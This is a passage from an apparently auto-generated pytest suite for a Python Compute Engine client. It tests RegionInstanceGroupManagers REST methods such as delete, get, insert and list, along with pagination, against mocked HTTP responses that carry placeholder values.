response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.create_instances(request)
def test_create_instances_rest_from_dict():
test_create_instances_rest(request_type=dict)
def test_create_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_create_instances_request_resource=compute.RegionInstanceGroupManagersCreateInstancesRequest(
instances=[compute.PerInstanceConfig(fingerprint="fingerprint_value")]
),
)
mock_args.update(sample_request)
client.create_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/createInstances"
% client.transport._host,
args[1],
)
def test_create_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_instances(
compute.CreateInstancesRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_create_instances_request_resource=compute.RegionInstanceGroupManagersCreateInstancesRequest(
instances=[compute.PerInstanceConfig(fingerprint="fingerprint_value")]
),
)
def test_delete_rest(
transport: str = "rest",
request_type=compute.DeleteRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.delete(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_delete_rest_bad_request(
transport: str = "rest",
request_type=compute.DeleteRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.delete(request)
def test_delete_rest_from_dict():
test_delete_rest(request_type=dict)
def test_delete_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
mock_args.update(sample_request)
client.delete(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}"
% client.transport._host,
args[1],
)
def test_delete_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete(
compute.DeleteRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
def test_delete_instances_rest(
transport: str = "rest",
request_type=compute.DeleteInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_delete_instances_request_resource"
] = compute.RegionInstanceGroupManagersDeleteInstancesRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.delete_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_delete_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.DeleteInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_delete_instances_request_resource"
] = compute.RegionInstanceGroupManagersDeleteInstancesRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.delete_instances(request)
def test_delete_instances_rest_from_dict():
test_delete_instances_rest(request_type=dict)
def test_delete_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_delete_instances_request_resource=compute.RegionInstanceGroupManagersDeleteInstancesRequest(
instances=["instances_value"]
),
)
mock_args.update(sample_request)
client.delete_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/deleteInstances"
% client.transport._host,
args[1],
)
def test_delete_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_instances(
compute.DeleteInstancesRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_delete_instances_request_resource=compute.RegionInstanceGroupManagersDeleteInstancesRequest(
instances=["instances_value"]
),
)
def test_delete_per_instance_configs_rest(
transport: str = "rest",
request_type=compute.DeletePerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_delete_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerDeleteInstanceConfigReq(names=["names_value"])
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.delete_per_instance_configs(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_delete_per_instance_configs_rest_bad_request(
transport: str = "rest",
request_type=compute.DeletePerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_delete_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerDeleteInstanceConfigReq(names=["names_value"])
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.delete_per_instance_configs(request)
def test_delete_per_instance_configs_rest_from_dict():
test_delete_per_instance_configs_rest(request_type=dict)
def test_delete_per_instance_configs_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_delete_instance_config_req_resource=compute.RegionInstanceGroupManagerDeleteInstanceConfigReq(
names=["names_value"]
),
)
mock_args.update(sample_request)
client.delete_per_instance_configs(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/deletePerInstanceConfigs"
% client.transport._host,
args[1],
)
def test_delete_per_instance_configs_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_per_instance_configs(
compute.DeletePerInstanceConfigsRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_delete_instance_config_req_resource=compute.RegionInstanceGroupManagerDeleteInstanceConfigReq(
names=["names_value"]
),
)
def test_get_rest(
transport: str = "rest", request_type=compute.GetRegionInstanceGroupManagerRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.InstanceGroupManager(
base_instance_name="base_instance_name_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
fingerprint="fingerprint_value",
id=205,
instance_group="instance_group_value",
instance_template="instance_template_value",
kind="kind_value",
name="name_value",
region="region_value",
self_link="self_link_value",
target_pools=["target_pools_value"],
target_size=1185,
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.InstanceGroupManager.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.InstanceGroupManager)
assert response.base_instance_name == "base_instance_name_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.fingerprint == "fingerprint_value"
assert response.id == 205
assert response.instance_group == "instance_group_value"
assert response.instance_template == "instance_template_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.target_pools == ["target_pools_value"]
assert response.target_size == 1185
assert response.zone == "zone_value"
def test_get_rest_bad_request(
transport: str = "rest", request_type=compute.GetRegionInstanceGroupManagerRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.get(request)
def test_get_rest_from_dict():
test_get_rest(request_type=dict)
def test_get_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.InstanceGroupManager()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.InstanceGroupManager.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
mock_args.update(sample_request)
client.get(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}"
% client.transport._host,
args[1],
)
def test_get_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get(
compute.GetRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
def test_insert_rest(
transport: str = "rest",
request_type=compute.InsertRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "region": "sample2"}
request_init["instance_group_manager_resource"] = compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.insert(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_insert_rest_bad_request(
transport: str = "rest",
request_type=compute.InsertRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "region": "sample2"}
request_init["instance_group_manager_resource"] = compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.insert(request)
def test_insert_rest_from_dict():
test_insert_rest(request_type=dict)
def test_insert_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1", "region": "sample2"}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager_resource=compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
),
)
mock_args.update(sample_request)
client.insert(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers"
% client.transport._host,
args[1],
)
def test_insert_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.insert(
compute.InsertRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager_resource=compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
),
)
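# Illustrative sketch (not collected by pytest): request resources are plain
# proto-plus messages and nest naturally, so the payload above can also be
# built field by field. initial_delay_sec is assumed from the Compute API.
def _example_nested_resource():
    policy = compute.InstanceGroupManagerAutoHealingPolicy(
        health_check="health_check_value",
        initial_delay_sec=300,  # grace period before autohealing, assumed field
    )
    manager = compute.InstanceGroupManager(auto_healing_policies=[policy])
    assert manager.auto_healing_policies[0].health_check == "health_check_value"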
def test_list_rest(
transport: str = "rest", request_type=compute.ListRegionInstanceGroupManagersRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "region": "sample2"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagerList(
id="id_value",
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagerList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListPager)
assert response.id == "id_value"
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
assert response.self_link == "self_link_value"
def test_list_rest_bad_request(
transport: str = "rest", request_type=compute.ListRegionInstanceGroupManagersRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "region": "sample2"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list(request)
def test_list_rest_from_dict():
test_list_rest(request_type=dict)
def test_list_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagerList()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagerList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1", "region": "sample2"}
# get truthy value for each flattened field
mock_args = dict(project="project_value", region="region_value",)
mock_args.update(sample_request)
client.list(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers"
% client.transport._host,
args[1],
)
def test_list_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list(
compute.ListRegionInstanceGroupManagersRequest(),
project="project_value",
region="region_value",
)
def test_list_rest_pager():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.RegionInstanceGroupManagerList(
items=[
compute.InstanceGroupManager(),
compute.InstanceGroupManager(),
compute.InstanceGroupManager(),
],
next_page_token="abc",
),
compute.RegionInstanceGroupManagerList(items=[], next_page_token="def",),
compute.RegionInstanceGroupManagerList(
items=[compute.InstanceGroupManager(),], next_page_token="ghi",
),
compute.RegionInstanceGroupManagerList(
items=[compute.InstanceGroupManager(), compute.InstanceGroupManager(),],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(
compute.RegionInstanceGroupManagerList.to_json(x) for x in response
)
        return_values = tuple(Response() for _ in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {"project": "sample1", "region": "sample2"}
pager = client.list(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.InstanceGroupManager) for i in results)
pages = list(client.list(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
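# The pager test above exercises both ways results come back: iterating the pager
# yields InstanceGroupManager items across pages, while .pages yields the raw
# per-page responses whose raw_page carries next_page_token. A consumption sketch
# built only on what the test asserts (hypothetical helper):
def _collect_list_results(client, request):
    items = list(client.list(request=request))
    tokens = [
        page.raw_page.next_page_token for page in client.list(request=request).pages
    ]
    return items, tokens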
def test_list_errors_rest(
transport: str = "rest",
request_type=compute.ListErrorsRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListErrorsResponse(
next_page_token="next_page_token_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListErrorsResponse.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list_errors(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListErrorsPager)
assert response.next_page_token == "next_page_token_value"
def test_list_errors_rest_bad_request(
transport: str = "rest",
request_type=compute.ListErrorsRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list_errors(request)
def test_list_errors_rest_from_dict():
test_list_errors_rest(request_type=dict)
def test_list_errors_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListErrorsResponse()
# Wrap the value into a proper Response obj
